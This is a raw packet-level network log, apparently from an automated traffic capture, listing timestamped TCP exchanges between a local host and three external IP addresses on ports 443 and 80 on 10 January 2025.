                                                                                                                                            Jan 10, 2025 17:17:29.899188042 CET44359371142.250.186.129192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:29.899271011 CET59371443192.168.2.7142.250.186.129
                                                                                                                                            Jan 10, 2025 17:17:29.899280071 CET44359371142.250.186.129192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:29.899322033 CET59371443192.168.2.7142.250.186.129
                                                                                                                                            Jan 10, 2025 17:17:29.901114941 CET44359371142.250.186.129192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:29.901186943 CET59371443192.168.2.7142.250.186.129
                                                                                                                                            Jan 10, 2025 17:17:29.901196957 CET44359371142.250.186.129192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:29.901240110 CET59371443192.168.2.7142.250.186.129
                                                                                                                                            Jan 10, 2025 17:17:29.903105974 CET44359371142.250.186.129192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:29.903173923 CET59371443192.168.2.7142.250.186.129
                                                                                                                                            Jan 10, 2025 17:17:29.903188944 CET44359371142.250.186.129192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:29.903233051 CET59371443192.168.2.7142.250.186.129
                                                                                                                                            Jan 10, 2025 17:17:29.904951096 CET44359371142.250.186.129192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:29.905002117 CET59371443192.168.2.7142.250.186.129
                                                                                                                                            Jan 10, 2025 17:17:29.905010939 CET44359371142.250.186.129192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:29.905055046 CET59371443192.168.2.7142.250.186.129
                                                                                                                                            Jan 10, 2025 17:17:29.906749964 CET44359371142.250.186.129192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:29.906799078 CET59371443192.168.2.7142.250.186.129
                                                                                                                                            Jan 10, 2025 17:17:29.906866074 CET44359371142.250.186.129192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:29.906917095 CET59371443192.168.2.7142.250.186.129
                                                                                                                                            Jan 10, 2025 17:17:29.908613920 CET44359371142.250.186.129192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:29.908667088 CET59371443192.168.2.7142.250.186.129
                                                                                                                                            Jan 10, 2025 17:17:29.908694029 CET44359371142.250.186.129192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:29.908740044 CET59371443192.168.2.7142.250.186.129
                                                                                                                                            Jan 10, 2025 17:17:29.910429001 CET44359371142.250.186.129192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:29.910525084 CET59371443192.168.2.7142.250.186.129
                                                                                                                                            Jan 10, 2025 17:17:29.910533905 CET44359371142.250.186.129192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:29.910599947 CET59371443192.168.2.7142.250.186.129
                                                                                                                                            Jan 10, 2025 17:17:29.912246943 CET44359371142.250.186.129192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:29.912309885 CET59371443192.168.2.7142.250.186.129
                                                                                                                                            Jan 10, 2025 17:17:29.912318945 CET44359371142.250.186.129192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:29.912364960 CET59371443192.168.2.7142.250.186.129
                                                                                                                                            Jan 10, 2025 17:17:29.914005995 CET44359371142.250.186.129192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:29.914082050 CET59371443192.168.2.7142.250.186.129
                                                                                                                                            Jan 10, 2025 17:17:29.914089918 CET44359371142.250.186.129192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:29.914130926 CET59371443192.168.2.7142.250.186.129
                                                                                                                                            Jan 10, 2025 17:17:29.915982962 CET44359371142.250.186.129192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:29.916038036 CET59371443192.168.2.7142.250.186.129
                                                                                                                                            Jan 10, 2025 17:17:29.916044950 CET44359371142.250.186.129192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:29.916081905 CET59371443192.168.2.7142.250.186.129
                                                                                                                                            Jan 10, 2025 17:17:29.917591095 CET44359371142.250.186.129192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:29.917658091 CET59371443192.168.2.7142.250.186.129
                                                                                                                                            Jan 10, 2025 17:17:29.917668104 CET44359371142.250.186.129192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:29.917706966 CET59371443192.168.2.7142.250.186.129
                                                                                                                                            Jan 10, 2025 17:17:29.919331074 CET44359371142.250.186.129192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:29.919378996 CET59371443192.168.2.7142.250.186.129
                                                                                                                                            Jan 10, 2025 17:17:29.919385910 CET44359371142.250.186.129192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:29.919440985 CET59371443192.168.2.7142.250.186.129
                                                                                                                                            Jan 10, 2025 17:17:29.921040058 CET44359371142.250.186.129192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:29.921101093 CET59371443192.168.2.7142.250.186.129
                                                                                                                                            Jan 10, 2025 17:17:29.921116114 CET44359371142.250.186.129192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:29.921154022 CET59371443192.168.2.7142.250.186.129
                                                                                                                                            Jan 10, 2025 17:17:29.922745943 CET44359371142.250.186.129192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:29.922808886 CET59371443192.168.2.7142.250.186.129
                                                                                                                                            Jan 10, 2025 17:17:29.922816038 CET44359371142.250.186.129192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:29.922858953 CET59371443192.168.2.7142.250.186.129
                                                                                                                                            Jan 10, 2025 17:17:29.925539970 CET44359371142.250.186.129192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:29.925595999 CET59371443192.168.2.7142.250.186.129
                                                                                                                                            Jan 10, 2025 17:17:29.925626993 CET44359371142.250.186.129192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:29.925674915 CET59371443192.168.2.7142.250.186.129
                                                                                                                                            Jan 10, 2025 17:17:29.926265955 CET44359371142.250.186.129192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:29.926316977 CET59371443192.168.2.7142.250.186.129
                                                                                                                                            Jan 10, 2025 17:17:29.926321983 CET44359371142.250.186.129192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:29.926372051 CET59371443192.168.2.7142.250.186.129
                                                                                                                                            Jan 10, 2025 17:17:29.927953005 CET44359371142.250.186.129192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:29.928019047 CET59371443192.168.2.7142.250.186.129
                                                                                                                                            Jan 10, 2025 17:17:29.928101063 CET44359371142.250.186.129192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:29.928145885 CET59371443192.168.2.7142.250.186.129
                                                                                                                                            Jan 10, 2025 17:17:29.930016041 CET44359371142.250.186.129192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:29.930073023 CET59371443192.168.2.7142.250.186.129
                                                                                                                                            Jan 10, 2025 17:17:29.930084944 CET44359371142.250.186.129192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:29.930125952 CET59371443192.168.2.7142.250.186.129
                                                                                                                                            Jan 10, 2025 17:17:29.930933952 CET44359371142.250.186.129192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:29.930984020 CET59371443192.168.2.7142.250.186.129
                                                                                                                                            Jan 10, 2025 17:17:29.930995941 CET44359371142.250.186.129192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:29.931046963 CET59371443192.168.2.7142.250.186.129
                                                                                                                                            Jan 10, 2025 17:17:29.932878017 CET44359371142.250.186.129192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:29.932971954 CET59371443192.168.2.7142.250.186.129
                                                                                                                                            Jan 10, 2025 17:17:29.932984114 CET44359371142.250.186.129192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:29.933029890 CET59371443192.168.2.7142.250.186.129
                                                                                                                                            Jan 10, 2025 17:17:29.933900118 CET44359371142.250.186.129192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:29.933953047 CET59371443192.168.2.7142.250.186.129
                                                                                                                                            Jan 10, 2025 17:17:29.933962107 CET44359371142.250.186.129192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:29.934010029 CET59371443192.168.2.7142.250.186.129
                                                                                                                                            Jan 10, 2025 17:17:29.935488939 CET44359371142.250.186.129192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:29.935533047 CET59371443192.168.2.7142.250.186.129
                                                                                                                                            Jan 10, 2025 17:17:29.935540915 CET44359371142.250.186.129192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:29.935585976 CET59371443192.168.2.7142.250.186.129
                                                                                                                                            Jan 10, 2025 17:17:29.936964989 CET44359371142.250.186.129192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:29.937006950 CET59371443192.168.2.7142.250.186.129
                                                                                                                                            Jan 10, 2025 17:17:29.937016010 CET44359371142.250.186.129192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:29.937052011 CET59371443192.168.2.7142.250.186.129
                                                                                                                                            Jan 10, 2025 17:17:29.937058926 CET44359371142.250.186.129192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:29.937098980 CET59371443192.168.2.7142.250.186.129
                                                                                                                                            Jan 10, 2025 17:17:29.938292027 CET44359371142.250.186.129192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:29.938343048 CET59371443192.168.2.7142.250.186.129
                                                                                                                                            Jan 10, 2025 17:17:29.938349962 CET44359371142.250.186.129192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:29.938386917 CET59371443192.168.2.7142.250.186.129
                                                                                                                                            Jan 10, 2025 17:17:29.939712048 CET44359371142.250.186.129192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:29.939766884 CET59371443192.168.2.7142.250.186.129
                                                                                                                                            Jan 10, 2025 17:17:29.939774990 CET44359371142.250.186.129192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:29.939814091 CET59371443192.168.2.7142.250.186.129
                                                                                                                                            Jan 10, 2025 17:17:29.941148043 CET44359371142.250.186.129192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:29.941235065 CET59371443192.168.2.7142.250.186.129
                                                                                                                                            Jan 10, 2025 17:17:29.941245079 CET44359371142.250.186.129192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:29.941282988 CET59371443192.168.2.7142.250.186.129
                                                                                                                                            Jan 10, 2025 17:17:29.943407059 CET44359371142.250.186.129192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:29.943459034 CET59371443192.168.2.7142.250.186.129
                                                                                                                                            Jan 10, 2025 17:17:29.943468094 CET44359371142.250.186.129192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:29.943505049 CET59371443192.168.2.7142.250.186.129
                                                                                                                                            Jan 10, 2025 17:17:29.945580006 CET44359371142.250.186.129192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:29.945626020 CET44359371142.250.186.129192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:29.945632935 CET59371443192.168.2.7142.250.186.129
                                                                                                                                            Jan 10, 2025 17:17:29.945640087 CET44359371142.250.186.129192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:29.945676088 CET59371443192.168.2.7142.250.186.129
                                                                                                                                            Jan 10, 2025 17:17:29.945708036 CET59371443192.168.2.7142.250.186.129
                                                                                                                                            Jan 10, 2025 17:17:29.945712090 CET44359371142.250.186.129192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:29.945751905 CET59371443192.168.2.7142.250.186.129
                                                                                                                                            Jan 10, 2025 17:17:29.949873924 CET44359371142.250.186.129192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:29.949922085 CET59371443192.168.2.7142.250.186.129
                                                                                                                                            Jan 10, 2025 17:17:29.949943066 CET44359371142.250.186.129192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:29.949976921 CET59371443192.168.2.7142.250.186.129
                                                                                                                                            Jan 10, 2025 17:17:29.949982882 CET44359371142.250.186.129192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:29.950020075 CET59371443192.168.2.7142.250.186.129
                                                                                                                                            Jan 10, 2025 17:17:29.950021982 CET44359371142.250.186.129192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:29.950054884 CET59371443192.168.2.7142.250.186.129
                                                                                                                                            Jan 10, 2025 17:17:29.950118065 CET59371443192.168.2.7142.250.186.129
                                                                                                                                            Jan 10, 2025 17:17:29.950134993 CET44359371142.250.186.129192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:30.228816986 CET5937280192.168.2.7132.226.8.169
                                                                                                                                            Jan 10, 2025 17:17:30.233625889 CET8059372132.226.8.169192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:30.233740091 CET5937280192.168.2.7132.226.8.169
                                                                                                                                            Jan 10, 2025 17:17:30.233901024 CET5937280192.168.2.7132.226.8.169
                                                                                                                                            Jan 10, 2025 17:17:30.238620043 CET8059372132.226.8.169192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:31.071775913 CET8059372132.226.8.169192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:31.116584063 CET5937280192.168.2.7132.226.8.169
                                                                                                                                            Jan 10, 2025 17:17:31.355133057 CET5937280192.168.2.7132.226.8.169
                                                                                                                                            Jan 10, 2025 17:17:31.360924959 CET8059372132.226.8.169192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:31.632733107 CET8059372132.226.8.169192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:31.679110050 CET5937280192.168.2.7132.226.8.169
                                                                                                                                            Jan 10, 2025 17:17:31.988446951 CET59373443192.168.2.7104.21.80.1
                                                                                                                                            Jan 10, 2025 17:17:31.988482952 CET44359373104.21.80.1192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:31.988717079 CET59373443192.168.2.7104.21.80.1
                                                                                                                                            Jan 10, 2025 17:17:31.990896940 CET59373443192.168.2.7104.21.80.1
                                                                                                                                            Jan 10, 2025 17:17:31.990914106 CET44359373104.21.80.1192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:32.465022087 CET44359373104.21.80.1192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:32.465219021 CET59373443192.168.2.7104.21.80.1
                                                                                                                                            Jan 10, 2025 17:17:32.469187021 CET59373443192.168.2.7104.21.80.1
                                                                                                                                            Jan 10, 2025 17:17:32.469207048 CET44359373104.21.80.1192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:32.469543934 CET44359373104.21.80.1192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:32.473150015 CET59373443192.168.2.7104.21.80.1
                                                                                                                                            Jan 10, 2025 17:17:32.519332886 CET44359373104.21.80.1192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:32.614835024 CET44359373104.21.80.1192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:32.614896059 CET44359373104.21.80.1192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:32.615020037 CET59373443192.168.2.7104.21.80.1
                                                                                                                                            Jan 10, 2025 17:17:32.619368076 CET59373443192.168.2.7104.21.80.1
                                                                                                                                            Jan 10, 2025 17:17:32.625464916 CET5937280192.168.2.7132.226.8.169
                                                                                                                                            Jan 10, 2025 17:17:32.630336046 CET8059372132.226.8.169192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:32.921567917 CET8059372132.226.8.169192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:32.924067974 CET59374443192.168.2.7104.21.80.1
                                                                                                                                            Jan 10, 2025 17:17:32.924113035 CET44359374104.21.80.1192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:32.924221992 CET59374443192.168.2.7104.21.80.1
                                                                                                                                            Jan 10, 2025 17:17:32.924524069 CET59374443192.168.2.7104.21.80.1
                                                                                                                                            Jan 10, 2025 17:17:32.924540043 CET44359374104.21.80.1192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:32.976159096 CET5937280192.168.2.7132.226.8.169
                                                                                                                                            Jan 10, 2025 17:17:33.411854982 CET44359374104.21.80.1192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:33.414315939 CET59374443192.168.2.7104.21.80.1
                                                                                                                                            Jan 10, 2025 17:17:33.414344072 CET44359374104.21.80.1192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:33.553425074 CET44359374104.21.80.1192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:33.553489923 CET44359374104.21.80.1192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:33.553808928 CET59374443192.168.2.7104.21.80.1
                                                                                                                                            Jan 10, 2025 17:17:33.554393053 CET59374443192.168.2.7104.21.80.1
                                                                                                                                            Jan 10, 2025 17:17:33.558140039 CET5937280192.168.2.7132.226.8.169
                                                                                                                                            Jan 10, 2025 17:17:33.559221983 CET5937580192.168.2.7132.226.8.169
                                                                                                                                            Jan 10, 2025 17:17:33.563175917 CET8059372132.226.8.169192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:33.563235998 CET5937280192.168.2.7132.226.8.169
                                                                                                                                            Jan 10, 2025 17:17:33.563939095 CET8059375132.226.8.169192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:33.564029932 CET5937580192.168.2.7132.226.8.169
                                                                                                                                            Jan 10, 2025 17:17:33.564125061 CET5937580192.168.2.7132.226.8.169
                                                                                                                                            Jan 10, 2025 17:17:33.568878889 CET8059375132.226.8.169192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:34.392492056 CET8059375132.226.8.169192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:34.393824100 CET59376443192.168.2.7104.21.80.1
                                                                                                                                            Jan 10, 2025 17:17:34.393857002 CET44359376104.21.80.1192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:34.393934011 CET59376443192.168.2.7104.21.80.1
                                                                                                                                            Jan 10, 2025 17:17:34.394468069 CET59376443192.168.2.7104.21.80.1
                                                                                                                                            Jan 10, 2025 17:17:34.394481897 CET44359376104.21.80.1192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:34.444924116 CET5937580192.168.2.7132.226.8.169
                                                                                                                                            Jan 10, 2025 17:17:34.852436066 CET44359376104.21.80.1192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:34.854523897 CET59376443192.168.2.7104.21.80.1
                                                                                                                                            Jan 10, 2025 17:17:34.854546070 CET44359376104.21.80.1192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:35.017466068 CET44359376104.21.80.1192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:35.017524004 CET44359376104.21.80.1192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:35.017658949 CET59376443192.168.2.7104.21.80.1
                                                                                                                                            Jan 10, 2025 17:17:35.018477917 CET59376443192.168.2.7104.21.80.1
                                                                                                                                            Jan 10, 2025 17:17:35.022509098 CET5937780192.168.2.7132.226.8.169
                                                                                                                                            Jan 10, 2025 17:17:35.027993917 CET8059377132.226.8.169192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:35.028074026 CET5937780192.168.2.7132.226.8.169
                                                                                                                                            Jan 10, 2025 17:17:35.028141022 CET5937780192.168.2.7132.226.8.169
                                                                                                                                            Jan 10, 2025 17:17:35.033632994 CET8059377132.226.8.169192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:35.893280983 CET8059377132.226.8.169192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:35.898669958 CET59378443192.168.2.7104.21.80.1
                                                                                                                                            Jan 10, 2025 17:17:35.898714066 CET44359378104.21.80.1192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:35.898818016 CET59378443192.168.2.7104.21.80.1
                                                                                                                                            Jan 10, 2025 17:17:35.903575897 CET59378443192.168.2.7104.21.80.1
                                                                                                                                            Jan 10, 2025 17:17:35.903594971 CET44359378104.21.80.1192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:35.944807053 CET5937780192.168.2.7132.226.8.169
                                                                                                                                            Jan 10, 2025 17:17:36.356761932 CET44359378104.21.80.1192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:36.413641930 CET59378443192.168.2.7104.21.80.1
                                                                                                                                            Jan 10, 2025 17:17:36.441927910 CET59378443192.168.2.7104.21.80.1
                                                                                                                                            Jan 10, 2025 17:17:36.441941023 CET44359378104.21.80.1192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:36.573823929 CET44359378104.21.80.1192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:36.573895931 CET44359378104.21.80.1192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:36.573987007 CET59378443192.168.2.7104.21.80.1
                                                                                                                                            Jan 10, 2025 17:17:36.574457884 CET59378443192.168.2.7104.21.80.1
                                                                                                                                            Jan 10, 2025 17:17:36.672327042 CET5937780192.168.2.7132.226.8.169
                                                                                                                                            Jan 10, 2025 17:17:36.673196077 CET5937980192.168.2.7132.226.8.169
                                                                                                                                            Jan 10, 2025 17:17:36.677977085 CET8059377132.226.8.169192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:36.678036928 CET8059379132.226.8.169192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:36.678055048 CET5937780192.168.2.7132.226.8.169
                                                                                                                                            Jan 10, 2025 17:17:36.678101063 CET5937980192.168.2.7132.226.8.169
                                                                                                                                            Jan 10, 2025 17:17:36.678400040 CET5937980192.168.2.7132.226.8.169
                                                                                                                                            Jan 10, 2025 17:17:36.683187008 CET8059379132.226.8.169192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:37.793323040 CET8059379132.226.8.169192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:37.795101881 CET59380443192.168.2.7104.21.80.1
                                                                                                                                            Jan 10, 2025 17:17:37.795161963 CET44359380104.21.80.1192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:37.795242071 CET59380443192.168.2.7104.21.80.1
                                                                                                                                            Jan 10, 2025 17:17:37.795495033 CET59380443192.168.2.7104.21.80.1
                                                                                                                                            Jan 10, 2025 17:17:37.795506954 CET44359380104.21.80.1192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:37.835419893 CET5937980192.168.2.7132.226.8.169
                                                                                                                                            Jan 10, 2025 17:17:38.278549910 CET44359380104.21.80.1192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:38.280376911 CET59380443192.168.2.7104.21.80.1
                                                                                                                                            Jan 10, 2025 17:17:38.280419111 CET44359380104.21.80.1192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:38.421197891 CET44359380104.21.80.1192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:38.421263933 CET44359380104.21.80.1192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:38.421410084 CET59380443192.168.2.7104.21.80.1
                                                                                                                                            Jan 10, 2025 17:17:38.421865940 CET59380443192.168.2.7104.21.80.1
                                                                                                                                            Jan 10, 2025 17:17:38.425110102 CET5937980192.168.2.7132.226.8.169
                                                                                                                                            Jan 10, 2025 17:17:38.426229000 CET5938180192.168.2.7132.226.8.169
                                                                                                                                            Jan 10, 2025 17:17:38.430075884 CET8059379132.226.8.169192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:38.430154085 CET5937980192.168.2.7132.226.8.169
                                                                                                                                            Jan 10, 2025 17:17:38.431119919 CET8059381132.226.8.169192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:38.431189060 CET5938180192.168.2.7132.226.8.169
                                                                                                                                            Jan 10, 2025 17:17:38.431283951 CET5938180192.168.2.7132.226.8.169
                                                                                                                                            Jan 10, 2025 17:17:38.436108112 CET8059381132.226.8.169192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:39.307950020 CET8059381132.226.8.169192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:39.351028919 CET5938180192.168.2.7132.226.8.169
                                                                                                                                            Jan 10, 2025 17:17:39.413837910 CET59382443192.168.2.7104.21.80.1
                                                                                                                                            Jan 10, 2025 17:17:39.413892984 CET44359382104.21.80.1192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:39.413978100 CET59382443192.168.2.7104.21.80.1
                                                                                                                                            Jan 10, 2025 17:17:39.418011904 CET59382443192.168.2.7104.21.80.1
                                                                                                                                            Jan 10, 2025 17:17:39.418031931 CET44359382104.21.80.1192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:39.871860981 CET44359382104.21.80.1192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:39.892493010 CET59382443192.168.2.7104.21.80.1
                                                                                                                                            Jan 10, 2025 17:17:39.892513990 CET44359382104.21.80.1192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:40.018439054 CET44359382104.21.80.1192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:40.018543005 CET44359382104.21.80.1192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:40.018582106 CET59382443192.168.2.7104.21.80.1
                                                                                                                                            Jan 10, 2025 17:17:40.020356894 CET59382443192.168.2.7104.21.80.1
                                                                                                                                            Jan 10, 2025 17:17:40.027662992 CET5938180192.168.2.7132.226.8.169
                                                                                                                                            Jan 10, 2025 17:17:40.028477907 CET5938380192.168.2.7132.226.8.169
                                                                                                                                            Jan 10, 2025 17:17:40.032741070 CET8059381132.226.8.169192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:40.032793045 CET5938180192.168.2.7132.226.8.169
                                                                                                                                            Jan 10, 2025 17:17:40.033348083 CET8059383132.226.8.169192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:40.033406019 CET5938380192.168.2.7132.226.8.169
                                                                                                                                            Jan 10, 2025 17:17:40.041066885 CET5938380192.168.2.7132.226.8.169
                                                                                                                                            Jan 10, 2025 17:17:40.045938015 CET8059383132.226.8.169192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:40.874217033 CET8059383132.226.8.169192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:40.875569105 CET59384443192.168.2.7104.21.80.1
                                                                                                                                            Jan 10, 2025 17:17:40.875622034 CET44359384104.21.80.1192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:40.875689983 CET59384443192.168.2.7104.21.80.1
                                                                                                                                            Jan 10, 2025 17:17:40.875932932 CET59384443192.168.2.7104.21.80.1
                                                                                                                                            Jan 10, 2025 17:17:40.875951052 CET44359384104.21.80.1192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:40.929205894 CET5938380192.168.2.7132.226.8.169
                                                                                                                                            Jan 10, 2025 17:17:41.329605103 CET44359384104.21.80.1192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:41.331145048 CET59384443192.168.2.7104.21.80.1
                                                                                                                                            Jan 10, 2025 17:17:41.331183910 CET44359384104.21.80.1192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:41.477401018 CET44359384104.21.80.1192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:41.477462053 CET44359384104.21.80.1192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:41.477520943 CET59384443192.168.2.7104.21.80.1
                                                                                                                                            Jan 10, 2025 17:17:41.477932930 CET59384443192.168.2.7104.21.80.1
                                                                                                                                            Jan 10, 2025 17:17:41.481112957 CET5938380192.168.2.7132.226.8.169
                                                                                                                                            Jan 10, 2025 17:17:41.482656002 CET5938580192.168.2.7132.226.8.169
                                                                                                                                            Jan 10, 2025 17:17:41.486064911 CET8059383132.226.8.169192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:41.486141920 CET5938380192.168.2.7132.226.8.169
                                                                                                                                            Jan 10, 2025 17:17:41.487484932 CET8059385132.226.8.169192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:41.488456964 CET5938580192.168.2.7132.226.8.169
                                                                                                                                            Jan 10, 2025 17:17:41.488456964 CET5938580192.168.2.7132.226.8.169
                                                                                                                                            Jan 10, 2025 17:17:41.493200064 CET8059385132.226.8.169192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:42.309870958 CET8059385132.226.8.169192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:42.311073065 CET59386443192.168.2.7104.21.80.1
                                                                                                                                            Jan 10, 2025 17:17:42.311120033 CET44359386104.21.80.1192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:42.311187983 CET59386443192.168.2.7104.21.80.1
                                                                                                                                            Jan 10, 2025 17:17:42.311408997 CET59386443192.168.2.7104.21.80.1
                                                                                                                                            Jan 10, 2025 17:17:42.311424971 CET44359386104.21.80.1192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:42.351119041 CET5938580192.168.2.7132.226.8.169
                                                                                                                                            Jan 10, 2025 17:17:42.776762009 CET44359386104.21.80.1192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:42.781291962 CET59386443192.168.2.7104.21.80.1
                                                                                                                                            Jan 10, 2025 17:17:42.781311989 CET44359386104.21.80.1192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:42.933187008 CET44359386104.21.80.1192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:42.933273077 CET44359386104.21.80.1192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:42.933322906 CET59386443192.168.2.7104.21.80.1
                                                                                                                                            Jan 10, 2025 17:17:42.939680099 CET59386443192.168.2.7104.21.80.1
                                                                                                                                            Jan 10, 2025 17:17:43.111886024 CET5938580192.168.2.7132.226.8.169
                                                                                                                                            Jan 10, 2025 17:17:43.112915039 CET5938780192.168.2.7132.226.8.169
                                                                                                                                            Jan 10, 2025 17:17:43.116839886 CET8059385132.226.8.169192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:43.117115974 CET5938580192.168.2.7132.226.8.169
                                                                                                                                            Jan 10, 2025 17:17:43.117732048 CET8059387132.226.8.169192.168.2.7
